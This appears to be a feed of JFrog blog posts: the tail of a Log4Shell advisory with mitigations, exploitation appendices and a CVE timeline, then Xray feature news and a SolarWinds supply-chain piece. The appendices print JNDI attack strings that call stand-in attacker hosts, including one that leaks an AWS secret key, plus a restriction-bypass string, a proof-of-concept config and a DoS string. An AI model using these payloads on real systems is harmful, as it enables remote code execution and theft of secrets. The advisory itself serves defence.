java ‐Dlog4j2.formatMsgNoLookups=True -jar vulnerable.jar

Method 2 – For all 2.x versions: removing the vulnerable class

On all log4j 2.x versions, it is possible to remove the JndiLookup class from any Java applications by executing this command:

find ./ -type f -name "log4j-core-*.jar" -exec zip -q -d "{}" org/apache/logging/log4j/core/lookup/JndiLookup.class \;

This will recursively find all log4j-core JAR files, starting from the current directory, and remove the vulnerable JndiLookup class from them. For full coverage, the command may be executed from the root directory of your project or server.

Note: This method is recommended only as a last resort since it is possible that the vulnerable JndiLookup class is embedded in recursive JAR files or in locations that the zip command is not accessible to. When choosing this method, it is highly recommended to verify manually that no JndiLookup classes are available to any Java application.

How can I use JFrog Xray to detect the Log4shell vulnerability?

Xray customers can scan artifacts as usual for detecting CVE-2021-44228. As always this can be done through CI/CD. 

Log4shell CVE-2021-44228

The JFrog CLI:

Log4shell detecting CVE-2021-44228 in JFrog CLI

Or the JFrog IDE plugin:

Log4shell detecting CVE-2021-44228 in JFrog IDE


Book a demo of Xray security tool!
Book a Demo

Appendix A

Vulnerable Example

Example application that will be vulnerable to remote exploitation (from LunaSec’s advisory):

 

import org.apache.logging.log4j.LogManager;

import org.apache.logging.log4j.Logger;

 

import java.io.*;

import java.sql.SQLException;

import java.util.*;

 

public class VulnerableLog4jExampleHandler implements HttpHandler {

 

  static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class.getName());

 

  /**

   * A simple HTTP endpoint that reads the request's User Agent and logs it back.

   * This is basically pseudo-code to explain the vulnerability, and not a full example.

   * @param he HTTP Request Object

   */

  public void handle(HttpExchange he) throws IOException {

    String userAgent = he.getRequestHeader("user-agent");

 

    // This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.

    // The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}

    log.info("Request User Agent:{}", userAgent);

 

    String response = "Hello There, " + userAgent + "!";

    he.sendResponseHeaders(200, response.length());

    OutputStream os = he.getResponseBody();

    os.write(response.getBytes());

    os.close();

  }

}

 

Appendix B –

Exploiting Log4Shell in newer Java versions

Method 1 – Abusing other message lookups

Although JNDI remote class loading is disabled in newer Java versions, the message lookup mechanism itself still works, and can be abused for various purposes:

  1. As mentioned before, using a string such as ${jndi:dns://dnsserver.com/somedomain} will cause the victim to send a DNS query to dnsserver.com (querying about the somedomain DNS record). This can be used to detect vulnerable log4j instances, tunnel back data or even as a DDoS attack (given enough vulnerable services)
  2. There are several lookup substitutions that reveal sensitive information from the victim machine. Most prominently, using the attack string ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.attacker-srv.com/foo} (with any protocol type) may leak the machine’s secret AWS access key, if this environment variable was exported to the vulnerable log4j process. Naturally, the attack string can be modified to leak any environment variable present in the vulnerable log4j process. Other interesting information-leaking lookups include:
    1. ${main:x} – leak the value of command line argument #x, which may contain sensitive data such as passwords or access keys passed through the command line.
    2. ${sys:propname} – leak the value of a Java System Property. For example this can be used to leak the current username (user.name):

log4shell - identify the security bearch - leaked username

Method 2 – Abusing factory classes in the local classpath

As thoroughly explained in this Veracode blog post, there are ways to exploit JNDI injections even on newer versions of Java, where remote deserializations are disabled.

For example, if the org.apache.naming.factory.BeanFactory class (which is usually shipped with Apache Tomcat servers) is available in the classpath of the vulnerable application that uses log4j, then the Log4Shell vulnerability can be exploited for remote code execution, regardless of the underlying JRE/JDK version.

This is due to the fact that even though newer versions of Java will not deserialize remote arbitrary classes, the attacker can still control the factory class and its attributes, through the supplied JNDI Reference:

Application that uses log4j, Log4Shell vulnerability can be exploited - Appache example -  

The remote attacker cannot supply an arbitrary factory class, but can reuse any factory class in the vulnerable program’s classpath as a gadget.

A useable factory class would have the following properties: 

  • Exist in the vulnerable program’s classpath
  • Implement the ObjectFactory interface
  • Implement the getObjectInstance method
  • Perform dangerous actions with the Reference’s attributes

The researchers identified that the BeanFactory class fits this bill, due to its dangerous use of Reflection – Arbitrary Java code objects are created, based solely on the Reference’s string attributes, which are attacker controlled.

The blog references full exploit code for hosting an RMI server with the proper Reference that can be used to exploit Log4shell in newer Java versions, on machines where the BeanFactory class is available in the vulnerable application’s classpath.

Note that the Log4Shell attack string for using such a server will be similar to –

${jndi:rmi://attacker-srv.com/foo}

However, the provided RMI server can also be converted to a ldap or ldaps server, in which case the attack string will change accordingly.

Since other “factory gadgets” such as the BeanFactory class may be found in the future, we highly suggest not relying on a newer Java version as the only line of defense against Log4Shell, and upgrading log4j and/or implementing some of our proposed mitigations.

Method 3 – Using serialized Java Objects with local gadget classes

As mentioned above, the naive attack vector will instruct the vulnerable Log4j2-based application to retrieve a remote serialized class, usually via LDAP, and load it – allowing the attacker full control on the contents of the class.

However, LDAP also supports sending a serialized Java Object (instance of a class) in the LDAP request itself, by using the javaSerializedData attribute.
Deserializing the Object is only possible if the Object’s class is available in the current classpath (a list of directories and JAR files that’s searched for classes).
An important distinction is that when deserializing an object, the trustURLCodebase security mitigation has no effect, since that specific mitigation only prevents loading of new codebases.

It is well-known that some specific Objects can directly lead to remote code execution when they are deserialized – the classes that these Objects are based on are colloquially called “gadgets”.
For example –  the ysoserial proof-of-concept tool aggregates some of these well known gadgets, and allows generation of Objects with arbitrary code execution payloads.

Therefore – an attacker that knows that a specific “gadget” class is present in the vulnerable application’s classpath, can generate such an Object, send it through LDAP and gain code execution when it is deserialized, regardless of the javaSerializedData attribute.

Furthermore – due to the information-leaking properties of the vulnerability mentioned above, an attacker may be able to build a fully-automated tool that first queries specific system properties from the vulnerable application (through the use of recursive lookups), determine if any gadget classes are present in the vulnerable application and then build a target-specific payload to gain remote code execution.

Until today, we have not seen such a tool publicly available or used in the wild, but unfortunately we believe that this malicious campaign is still far from over.

 

Appendix C –

Bypassing the LOG4J_FORMAT_MSG_NO_LOOKUPS mitigation by using CVE-2021-45046

We would like to preface this section by saying that the prerequisites for performing this bypass are highly unlikely, and as such we still consider the LOG4J_FORMAT_MSG_NO_LOOKUPS mitigation effective in the vast majority of cases.

Due to the disclosure of CVE-2021-45046, it was revealed that one of the suggested mitigation techniques, namely – disabling the message lookup mechanism, can be bypassed in certain non-default configurations.

The bottom line is – if CVE-2021-45046 can be exploited on Log4j2 2.10.0 – 2.14.1 (inclusive), it allows the attacker to bypass both the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable mitigation, and the log4j2.noFormatMsgLookup system property mitigation.

So – what are the conditions for the exploitation of CVE-2021-45046?

(Credit to community project log4shell-vulnerable-app that implemented similar example conditions)

  1. A new (non-default) pattern layout must be added to the Log4j2 configuration. The pattern layout must use a Context Lookup (${ctx:). An example of a vulnerable log4j2.properties file –

    # vulnerable in 2.14.1 even with ENV LOG4J_FORMAT_MSG_NO_LOOKUPS true
    appender.console.layout.pattern = ${ctx:useragent} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n

    Note that the Log4j2 configuration can be specified in many different ways, but in any case there are no default Context Lookup pattern layouts –

    COnfiguration of Log4j 2

  1. The vulnerable application must use a Thread Context Map, where the attacker has control of the input data, for example:

    public void handle(HttpExchange he) throws IOException {
        // userAgent is attacker-controlled
        String userAgent = he.getRequestHeader("User-Agent"); 
         
        // Note that 1st argument matches the variable name from the configured pattern
        ThreadContext.put("useragent", userAgent); 
         
        // The log message itself doesn't need to contain any message lookup
        log.info("Received a request with User-Agent");
        ...

In case both of these conditions exist, an attacker can send an attack token “as usual” – for example in this case, the attacker may send an HTTP request such as –

GET / HTTP/1.1
Host: somedomain.com
User-Agent: ${jndi:ldap://attacker-srv.com/foo}

and code execution will occur, despite the LOG4J_FORMAT_MSG_NO_LOOKUPS mitigation.

 

Update #1 – more examples of vulnerable patterns, as tweeted by @pwntester –

MapMessage

Example pattern layout:

appender.console.layout.pattern = ${map:tainted} ...

Example Java code passing user-controlled data (TAINTED):

MapMessage msg = new StringMapMessage().with("message", "H").with("tainted", TAINTED);
logger.error(msg);

 

Jackson (only if Jackson is in the application’s classpath)

Example pattern layout:

appender.console.layout.pattern = ${map:tainted} ...

Example Java code passing user-controlled data (TAINTED):

logger.info(new ObjectMessage(TAINTED));

StructuredDataMessage

Example pattern layout:

appender.console.layout.pattern = ${sd:tainted} ...

Example Java code passing user-controlled data (TAINTED):

StructuredDataMessage m = new StructuredDataMessage("1", "H", "event");
m.put("tainted", TAINTED);
logger.error(m);

 

Update #2 – Even more examples of vulnerable patterns, discovered and validated by the JFrog security research team –

Environment

Example pattern layout:

appender.console.layout.pattern = ${env:TAINTED_ENV_VAR} ...

 

Main Arguments

Example pattern layout:

appender.console.layout.pattern = ${main:0} ...

Example Java code passing user-controlled data (TAINTED):

MainMapLookup.setMainArguments(args);
logger.error("foo");

 

Event (Message)

Example configuration:


<?xml version="1.0" encoding="UTF-8"?> 
<Configuration status="WARN" name="RoutingTest"> 
  <Appenders> 
    <Routing name="Routing"> 
      <Routes> 
        <Route pattern="aaa"> 
          <Console name="STDOUT"> 
            <PatternLayout> 
              <pattern>${event:Message} ... </pattern> 
            </PatternLayout> 
          </Console> 
        </Route> 
      </Routes> 
    </Routing> 
  </Appenders> 
  <Loggers> 
    <Root level="error"> 
      <AppenderRef ref="Routing" /> 
    </Root> 
  </Loggers> 
</Configuration>

 This will effectively turn message lookups back on. As such, exploitation can be performed similarly to older Log4j versions - logger.info("${jndi:ldap://attacker.com/foo}");

 

Appendix D –

Exploiting Log4j2 2.15.0 for remote code execution

Log4j2 2.15.0 added a few important mitigations to deny exploitation of Log4Shell (CVE-2021-44228). These are the added mitigations and their current bypass status –

    1. Message lookups are disabled by default – Can be bypassed in specific configurations  (CVE-2021-45046 and more)

 

    1. allowedJndiProtocols – JNDI only allowed the following protocols by default – LDAP, LDAPS, Java (local) – No known bypass

 

    1. allowedLdapHosts – JNDI over LDAP may only access the local host by default (127.0.0.1/localhost) – Can be bypassed in specific operating systems (macOS, FreeBSD, Fedora, Arch Linux and Alpine Linux)

 

    1. allowedLdapClasses – JNDI over LDAP may only load Java primitive classes by default – Can always be bypassed

 

Due to the bypasses of mitigations #3 and #4, CVE-2021-45046 was upgraded from “Low” (3.7) severity to “Critical” (9.0) severity, since exploiting it immediately leads to RCE. That being said, as we mentioned above we still consider the prerequisites for the exploitation of CVE-2021-45046 as highly unlikely, due to them requiring a rare non-default configuration.

Here are some more details about the specific bypasses –

Message lookups are disabled by default

This mitigation can be bypassed by –

    1. Any one of the configurations specified in Appendix C

 

    1. If the application explicitly allowed for message lookup, by defining a pattern layout containing %m{lookups} in one of the configuration files. For example – appender.console.layout.pattern = %m{lookups}

 

As mentioned, bypassing this mitigation in Log4j2 2.15.0 currently directly leads to RCE.

 

JNDI over LDAP may only access the local host by default

As tweeted by @marcioalm, an attack string similar to ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} will bypass the localhost restriction, but end up contacting the remote evilhost.com We were able to reproduce this bypass only when the vulnerable application runs on macOS and FreeBSD. External sources have also reported Fedora, Arch Linux and Alpine Linux as vulnerable. On other operating systems Java throws an UnknownHostException (tested on Ubuntu, Debian & Windows)

 

JNDI over LDAP may only load Java primitive classes by default

Note that both of the following bypasses will work on version 2.16.0 as well, if JNDI has been enabled by a non-default configuration

Bypass #1 – Time-of-check, Time-of-use attack

This vulnerability was independently discovered and disclosed to Apache by JFrog’s security research team and other security researchers.

The class-loading mitigation introduced in version 2.15.0 first inspects the requested LDAP attributes by calling getAttributes and later loads the class/object specified by LDAP by calling lookup:


if (LDAP.equalsIgnoreCase(uri.getScheme()) || LDAPS.equalsIgnoreCase(uri.getScheme())) {
	if (!allowedHosts.contains(uri.getHost())) {
		LOGGER.warn("Attempt to access ldap server not in allowed list");
		return null;
	}
	// GET THE CLASS ATTRIBUTES
	Attributes attributes = this.context.getAttributes(name);
	if (attributes != null) {
		// CLASS LOADING CHECKS HERE
		...
	}
	...
}
...
// LOAD THE CLASS
return (T) this.context.lookup(name);
...

However – both the getAttributes and lookup calls will cause separate LDAP requests to be sent

A malicious server is not required to send back the same LDAP response for both the getAttributes and lookup requests.

Therefore – an attacker can easily implement an LDAP server which operates as follows –

  • On LDAP request #1 – Send back a response with NULL attributes (will cause the package code to skip all attributes checking)
  • On LDAP request #2 – Send back a malicious response (ex. the attacker’s URL in javaCodeBase)

Log4shell vulnerability - Time-of-Check, Time-of-Use (ToCToU) attack

This is a classic Time-of-Check, Time-of-Use (ToCToU) attack, albeit without a race condition as the attacker’s server is consulted synchronously.

Advantages – Does not rely on a “gadget” class being available in the classpath of the vulnerable application
Disadvantages – Loading a remote codebase is blocked in newer Java versions (where trustURLCodebase is false)

Bypass #2 – Using serialized objects with a forged name

When deserializing an embedded Java object, the check for the object’s class was implemented in an incomplete manner, since the class comparison is done by name only:


if (attributeMap.get(SERIALIZED_DATA) != null) {
	if (classNameAttr != null) {
		String className = classNameAttr.get().toString();
		if (!allowedClasses.contains(className)) {
			LOGGER.warn("Deserialization of {} is not allowed", className);
			return null;
		}

Therefore – an attacker can specify an arbitrary serialized object in the LDAP response,  but set the javaClassName to one of the primitive types to bypass the check – private static final List permanentAllowedClasses = Arrays.asList(Boolean.class.getName(),
Byte.class.getName(), Character.class.getName(), Double.class.getName(), Float.class.getName(),
Integer.class.getName(), Long.class.getName(), Short.class.getName(), String.class.getName());

Similarly to the previous serialized object bypass, this relies on the victim having the appropriate “gadget” class of the serialized object in the local classpath.

Advantages – Works on newer Java versions (where trustURLCodebase is false)
Disadvantages – Relies on a “gadget” class being available in the classpath of the vulnerable application

 

Appendix E –

Impact analysis of CVE-2021-45105 in Log4j2

Recently, a new denial of service CVE in Log4j2 was published – CVE-2021-45105, with CVSS 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). The JFrog security team has validated the CVE data and claims on version 2.16.0, and estimated a CVSS of 3.7 (AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). This estimation is based on the following –

CVE-2021-45105 Prerequisites

Although not explicitly specified in the CVE, the prerequisites for this attack are exactly the same as CVE-2021-45046 – namely, the attacker must control a non-message part of one of the pattern layouts. Therefore, the exploitation case mentioned in the CVE (“attacker with control over Thread Context Map”) is only one of the applicable cases. In reality, an attacker can abuse any non-default configuration as specified in Appendix C. For example – a configured pattern with a MapMessage will also make the application vulnerable to this CVE (as long as the attacker controls the tainted variable)  – appender.console.layout.pattern = ${map:tainted} - %-5p %c{1}:%L - %m%n From our perspective, the requirement for such a non-default (and unlikely) configuration raises the attack complexity of this issue to “High”.

Denial-of-Service impact

Running the public exploit string – ${::-${::-${}}} on a vulnerably-configured Log4j2 version 2.16.0, yields an IllegalStateExceptionDenial of service impact The PoC string does not cause any excessive CPU or memory usage, and as such the DoS impact (if any) should not have any system-wide impact. Since by default exceptions are ignored in Log4j2 Appenders (logged only, not thrown) , the thrown exception does not crash the server and as such the DoS impact is completely mitigated:

private void handleAppenderError(final LogEvent event, final RuntimeException ex) {
    appender.getHandler().error(createErrorMsg("An exception occurred processing Appender "), event, ex);
    if (!appender.ignoreExceptions()) { // ignoreExceptions=true, by default
        throw ex;
    }
}

Official Fix

The issue can be fixed by upgrading Log4j2 to version 2.17.0.

The official fix (version 2.17.0) changes the StrSubstitutor  logic to handle the PoC’s edge case, and does not throw any exceptions when faced with a similar input.
For legacy (Java 7) users, it has been hinted that version 2.12.3 will be released to fix this issue, although at the time of writing no such version is available.

 

Mitigations of CVE-2021-45105

Note that this issue is not related to JNDI, and as such all previous proposed mitigations (ex. removing the JndiLookup class) will not mitigate this issue.

To mitigate this issue, in non-default cases where the exception is not ignored, vendors can wrap the logging code with an exception handler, so that DoS will not occur.

 

To summarize – this CVE currently does not seem to pose a real-world threat to production web applications.
As mentioned, JFrog’s real-world estimated CVSS is 3.7 (AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L)
We advise vendors to focus on upgrading any older Log4j2 deployments to 2.16.0, before tackling the task of upgrading 2.16.0 deployments to 2.17.0.

 

Appendix F –

Log4shell timeliene

18.07.2013 – The vulnerable JNDI lookup feature was committed.
24.11.2021 – Chen Zhaojun, an employee of Alibaba reported on the vulnerability to Apache.
26.11.2021 – CVE-2021-44228 was assigned in MITRE.
01.12.2021 – Earliest evidence for exploitation of the vulnerability (according to Cloudflare), might suggest that the vulnerability details were leaked before public disclosure.
05.12.2021 – Apache’s developers created a bug ticket for resolving the issue, release version 2.15.0 is marked is the target fix version.
09.12.2021 – CVE-2021-44228 went public (the original Log4Shell CVE).
09.12.2021 – A security researcher dropped a zero-day remote code execution exploit on Twitter. The tweet was later deleted.
10.12.2021 – Version 2.15.0 was released (fixes CVE-2021-44228) with a fix that disables message lookups by default, and restricts JNDI operation to specific classes & hostnames.
10.12.2021 – Detected attacks on Minecraft servers.
13.12.2021 – Version 2.16.0 was released (fixes CVE-2021-45046) which completely removes message lookups (cannot be enabled in any configuration) and disables JNDI support by default (can be re-enabled).
14.12.2021 – CVE-2021-45046 went public, showing that Log4Shell can still be exploited on non-default configurations, but without a severe effect.
15.12.2021 – Version 2.12.2 was released (with similar fixes to 2.16.0) for backport support to Java 7.
16.12.2021 – The CVSS for CVE-2021-45046 was raised to 9.0, due to discovering several bypasses for the hostname and classes mitigations on Log4J 2.15.0.
18.12.2021 – CVE-2021-45105 went public, showing a minor bug in Log4J’s string substitution, that may cause an exception to be thrown, in non-default configurations.
18.12.2021 – Version 2.17.0 was released (fixes CVE-2021-45105) which reimplemented string substitution and locked down JNDI to be used only locally.
22.12.2021 – Version 2.12.3 was released (with similar fixes to 2.17.0) for backport support to Java 7.
22.12.2021 – Version 2.3.1 was released (with similar fixes to 2.17.0) for backport support to Java 6.

 

Appendix G –

Impact analysis of CVE-2021-44832

An additional remote code execution CVE in Log4j2 2.17.0 was published – CVE-2021-44832, with CVSS 6.6 (AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H).

The CVE was fixed in versions 2.17.1 (Java 8), 2.13.4 (Java 7) and 2.3.2 (Java 6).

The CVE has extremely high prerequisites (detailed below) and as such is unlikely to affect any real-world system.

At this point, we do not believe upgrading from Log4j2 2.17.0 (or equivalent versions) is critical.

CVE-2021-44832 Prerequisites

Currently, exploitation of the vulnerability is possible only if the attacker has direct control of Log4J’s configuration file, and specifically if the attacker can add a “JDBCAppender” with arbitrary attributes.

The vulnerability is caused due to the “JDBCAppender” accepting a JNDI data source in its DataSource attribute.
When accessing a JNDI data source, remote protocols (such as LDAP) are still available, which means that specifying a string such as ldap://attacker.com:1337 will cause the vulnerable app to contact the attacker’s server, which can provide a remote class or serialized object to load.

PoC

This is an extremely minimal configuration file that will trigger the vulnerability:


<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="WARN" name="Config1">
  <Appenders>
    <JDBC name="jdbcTest">
      <DataSource jndiName="ldap://attacker.com:1337/Exploit" />
    </JDBC>
  </Appenders>
</Configuration>

As mentioned, Log4j can be configured via many different formats (JSON, YAML, properties, etc.), therefore this is just one example of a working PoC.

Note that the vulnerable application does not actually have to log anything, but the logger does need to be initialized, for example like so –

Logger logger = LogManager.getLogger("HelloWorld");

CVE-2021-44832 Official Fix

The issue can be fixed by upgrading Log4j2 to version 2.17.1 (Java 8), 2.13.4 (Java 7) or 2.3.2 (Java 6).

The official fix disables the JNDI support for the JDBCAppender (by default) and adds a system property called log4j2.enableJndiJdbc that allows re-enabling it.

In addition, JDBC now reuses the common JNDIManager class, which means all previous restrictions on JNDI will apply, even when “enableJndiJdbc” is configured (ex. only the local java protocol is allowed in connection strings)

Mitigations of CVE-2021-44832

Similarly to the well-known Log4Shell mitigation, it is possible to remove the “JdbcAppender.class” file from the Log4J JAR file –

find ./ -type f -name "log4j-core-*.jar" -exec zip -q -d "{}" org/apache/logging/log4j/core/appender/db/jdbc/JdbcAppender.class \;


JFrog Releases OSS Tools for Identifying Log4J Utilization & Risk
Get the Scanning Tools

 

Read all about the NEW Zero-Day SpringShell Vulnerability

]]>
New Xray Features Enhance Workflows, Productivity and UX https://jfrog.com/blog/new-xray-features-enhance-worflows-productivity-and-ux/ Thu, 21 Oct 2021 14:34:28 +0000 https://jfrog.com/?p=83331

The recently released JFrog Xray versions 3.31 & 3.32 have brought to the table a raft of new capabilities designed to improve and streamline your workflows, productivity and user experience. 

The new features, detailed below, solidify Xray as the optimum universal software composition analysis (SCA) solution for JFrog Artifactory  that’s trusted by developers and DevSecOps teams to identify and eliminate open source software vulnerabilities and license compliance violations from their Software Distribution

Xray Reports Clone

This new feature, which requires Artifactory 7.23.x and above, lets you quickly and efficiently create a clone of an existing report in Xray Reports to reuse a report and its defined settings and configurations, saving you lots of time when recreating reports that you use often. 

Hot Upgrade 

With this new hot upgrade capability, you can upgrade any Xray High Availability (HA) installation easily and without having to turn off all the secondary nodes. By completing an Xray HA upgrade with zero downtime, you boost your team’s productivity. 

Set a Grace Period before Failing Build

If a CI server requests a build to be scanned, and a watch you’ve set up triggers a violation, Xray will indicate that the build job should fail.

Failing builds is a common practice to secure CI builds and prevent violations from entering your CI/CD pipeline. However, you may not always want to fail the build. For example, some violations are not showstoppers, and you can look into them later without stopping the build creation. 

In these cases, you can set a grace period for a number of days according to your needs. During the grace period, the build will not fail and all violations will be ignored. An automatic Ignore Rule is created for the grace period with the following criteria:

  • On the specific vulnerability/license
  • On the specific component
  • On any version of the specific build
  • On the specific policy
  • On the specific watch

Once the grace period ends, the ignore rule is deleted, and if the build contains violations, it will fail. This capability is only available if the watch is defined with build as target type.

For more detailed information, see Creating Xray Policies and Rules.

Grace Period REST API Support

A new parameter has been added to support the Grace Period feature in the Create Policy REST API. 

Enhanced Xray Dependency Scanning and On-Demand Binary Scanning

Shifting left means catching and fixing vulnerabilities and license violations as early as possible in your SDLC, including  before developers check in code. Performing on-demand scanning of either your source code dependencies or binaries before committing to Artifactory is the ultimate shift-left tactic. Here are some reasons why you need this use case: 

  • Not all of your binaries or builds are stored in Artifactory
  • You discover vulnerabilities/licensing violations before uploading to Artifactory
  • A security person may need to scan a binary sent to them for verification
  • Organizations may want to only deploy approved binaries into Artifactory

The recently introduced Xray Dependencies and Xray On-Demand Binary  scanning capabilities now include the option to ignore violations. In the JSON report of each scan, an Ignore Rule URL is included in the results, enabling you to create ignore rules for violations in the report, as described in Ignore Rules

New Filter in Watches

Starting from Xray version 3.31.x and above, you can filter the Watches list in the Watches page in Xray to narrow down and display only Watches that are relevant to you. When you select the Filter button in the top-right corner, the filter dropdown list appears, with an array of different options. Configure the filtering options to display the Watches or Watch data you want to see. 

For more information, see Configuring Xray Watches.

Filter Ignore Rules

Now you can use an array of different filtering options to narrow down the list of Ignore Rules using  different criteria. That way,  you’ll only see Ignore Rules that are relevant to you. After selecting the Filter button in the top-right corner, the filter dropdown appears and you can configure the options to display the Ignore Rules or Ignore Rules data you want to see.

[Note: The new features mentioned above require Artifactory version 7.25.x and higher.]

For more information, see Ignore Rules.

Ignore Rules REST API Enhancement 

If you and your team are working together using JFrog Projects and the REST API, we have a great new feature that will allow you to sort the Get Ignore Rules REST API by project. This can streamline your workflows while working with REST APIs and Ignore Rules in JFrog Projects.

These exciting new features are available now for Xray users. Don’t have a JFrog account yet? You can easily get free access to Artifactory and Xray in two ways: A 30-day free trial with our Self Hosted option, or a permanent free subscription with our Cloud option, which also includes JFrog Pipelines, our CI/CD orchestration solution.

]]>
SDLC Security: It’s Personal for JFrog https://jfrog.com/blog/sdlc-security-its-personal-for-jfrog/ Wed, 23 Dec 2020 16:29:06 +0000 https://jfrog.com/?p=68026

The SolarWinds hack, which has affected high-profile Fortune 500 companies and large U.S. federal government agencies, has put the spotlight on software development security — a critical issue for the DevOps community and for JFrog. At a fundamental level, if the code released via CI/CD pipelines is unsafe, all other DevOps benefits are for naught.

What happened

SolarWinds, an IT monitoring and management vendor, said hackers breached its systems and inserted malware into the software build process of its Orion Platform. For several months, product updates shipped with the vulnerability, which was designed to help hackers compromise customers’ Orion servers using a backdoor. 

It’s estimated that about 18,000 customers received the contaminated updates, and that several dozen got breached. Those affected include Microsoft, the U.S. Department of Homeland Security (DHS), and FireEye, a cyber security vendor which first detected the attack this month after the hackers stole proprietary security tools it offers to its clients.

SDLC Security Under the Microscope

SolarWinds, which builds all products utilizing a secure development lifecycle, including architectural reviews, static and dynamic code analysis, and open-source analysis, has already tightened its SDLC security, including by:

  • Further restricting access rights to its build environment
  • Using a new code-signing certificate for new builds
  • Reviewing the build environment’s architecture, the privileged and non-privileged users with access to it, and the network surrounding it

It’s also been reported that the company may have inadvertently exposed FTP credentials in a public Github repository last year, raising the question of whether this may have been an avenue for the hackers to breach its systems.


Rolling out a comprehensive, holistic DevSecOps strategy is a must, especially with the exponential growth of open source software, which we know often contains vulnerabilities and other security faults.
Click To Tweet


A Troubling Trend

This type of breach, known as an upstream supply chain attack, has become increasingly popular among hackers, because it offers an extremely effective vector. By poisoning code that’s assumed to be safe, cyber criminals exploit the trusted relationship between software providers and their customers. Hackers’ malware hides in legitimate software and gets unknowingly shipped to thousands of customers through otherwise official distribution methods.

How JFrog Can Help

JFrog has been creating awareness about DevSecOps and building security capabilities into its platform for years. It’s our belief that security must be baked end-to-end into the SDLC — from design to production. 

That way, security gaps — vulnerabilities, malware, misconfigurations, policy violations and more — can be caught early and often, and fixed immediately, before bad actors get a chance to exploit them.

It’s a broad, complex undertaking that requires a holistic, multi-dimensional approach, and that encompasses application security, infrastructure security, data security and comprehensive role-based access control (RBAC). 

Here’s a brief rundown of what we offer for DevSecOps within the JFrog Platform, as well as some recommendations.

JFrog Xray

JFrog Xray is our DevSecOps tool, designed to offer continuous security and universal artifact analysis. Through a multilayer analysis of containers and software artifacts, this software composition analysis (SCA) tool scans vulnerabilities and detects license compliance issues, and helps you take appropriate action quickly.

JFrog Xray is natively integrated with JFrog Artifactory, our platform’s flagship component, providing optimized scanning, unified operation, and a single pane of glass view into your artifacts’ security and compliance issues. Identification of vulnerabilities and traceability of your builds are inseparable. You must weave security and license compliance tightly into your artifact management system. That way, when a vulnerability is detected, you know how it got there and how it impacts everything else. 

In addition, Artifactory provides granular RBAC capabilities, so you can limit access to artifacts, and determine what kind of access to grant, such as read-write, or read-only permissions. Furthermore, Artifactory’s rich metadata gives you full traceability of artifacts. That way, you can respond instantly to breaches, and generate a new, safe build with uncompromised components — in hours, not days.

JFrog Xray’s deep recursive scanning gives you visibility into all the underlying layers and dependencies of components, and provides complete impact analysis, so you can understand which artifacts contain insecure components. And it does all this continuously and at the speed of DevOps, so you can identify and fix violations early and often in the SDLC — even directly from within your IDE — without creating security-check bottlenecks at the end of the cycle.

Attempting to do all this manually, and with disparate point tools that don’t interoperate well, slows you down, and prevents you from pinpointing security issues with precision and at scale — putting you at risk for breaches.

JFrog Pipelines

As we’ve explained before, keeping secrets safe can be challenging for CI/CD tools. They must connect to many other services, each with its own password or token — data that must be shielded from cyber crooks.

JFrog Pipelines was designed for secrecy from the start, with native, built-in secrets management. Through its integrations capabilities, Pipelines combines central secrets management with granular access permissions of the JFrog Platform. Its out-of-the-box integrations include GitHub, Bitbucket, Docker, Kubernetes, and Slack, as well as public cloud platforms, such as AWS, GCP, and Azure.

With Pipelines integrations, you can share secure resources, while safeguarding the secrets that authorize their use. Using the JFrog Platform’s unified permissions model, you can grant access to those who need it and block access to everyone else. This all automates and streamlines the process of protecting secrets from being inadvertently exposed or actively stolen from your CI/CD tools.

Best Practices

Rolling out a comprehensive, holistic DevSecOps strategy is a must, especially with the exponential growth of open source software, which we know often contains vulnerabilities and other security faults. As we outlined in this white paper, these recommendations provide a solid baseline for starting or fine-tuning your DevSecOps practices:

  • Establish DevSecOps as a cornerstone of your SDLC
  • Instill security knowledge and ownership across your developer and operations teams
  • Utilize security and compliance best practices and adopt continuous improvement tactics
  • Use an integrated suite of DevSecOps tools that can automate security and governance
  • Ensure your toolsuite includes a universal software composition analysis solution
  • Utilize the most comprehensive and timely vulnerability intelligence database
  • For companies receiving software updates from trusted vendors: Practice due diligence and have a proper security-focused policy for accepting code contributions from any source. While it is time intensive, every code change should go through at least two sets of eyes. That way if credentials are abused to inject new code into a project, a second person would be responsible for checking that code.
  • For DevOps teams to prevent having their pipeline breached and their code tampered with by hackers: DevOps teams should periodically review third-party code used in their software. Do they still need it? Is the project actively maintained? Is there a history of vulnerabilities in the code? Does that project have a policy that includes reviewing contributions from outside parties? These are all important questions to ask.

Take a free JFrog Trial and experience first-hand how Xray’s deep binary scanning and impact analysis capabilities boost security and compliance across your DevOps pipeline.

]]>
A Few Minutes More: Add Xray DevSecOps to Artifactory Enterprise on Azure https://jfrog.com/blog/add-xray-secops-to-artifactory-enterprise-on-azure/ Thu, 15 Oct 2020 18:00:48 +0000 https://jfrog.com/?p=65316

Editor’s Note (2024): Please refer to the current JFrog Software Supply Chain Platform listing on Azure Marketplace to get started with JFrog on Microsoft Azure.

 

In a prior blog post, we explained how to install or update Artifactory through the Azure Marketplace in the amount of time it takes for your coffee order to arrive on the counter.

Now you can add to your self-managed (BYOL) Artifactory deployment Xray, the cream of software composition analysis (SCA) tools, through the Azure Marketplace as well.

JFrog Xray is a universal SCA solution that natively integrates with Artifactory, giving developers and DevSecOps teams an easy way to proactively identify open source vulnerabilities and license compliance violations, before releasing at-risk applications into production. 

Why Add Xray SCA

Xray supports all major package types and integrations, knowing how to unpack each one and what every underlying layer contains. Xray’s deep recursive scanning sees into all the underlying layers & dependencies of components, even those packaged in Docker images and ZIP files.

JFrog Xray Integrations

Each unpacked component is examined to uncover potential vulnerabilities and license compliance violations.

From this data, Xray can present a component graph analysis of every artifact and dependency structure, providing you unique visibility to determine the impact of all discovered risks.JFrog Xray UI

What You Need

You will need a few things before you get started:

Installing an Azure PostgreSQL Server

Xray uses a database to index component vulnerability data. Like Artifactory, you can configure Xray with a database source of your choice.

Our recommended best practice configuration for Xray is to use a database server on a node that is separate from the node where Artifactory and Xray runs.

 

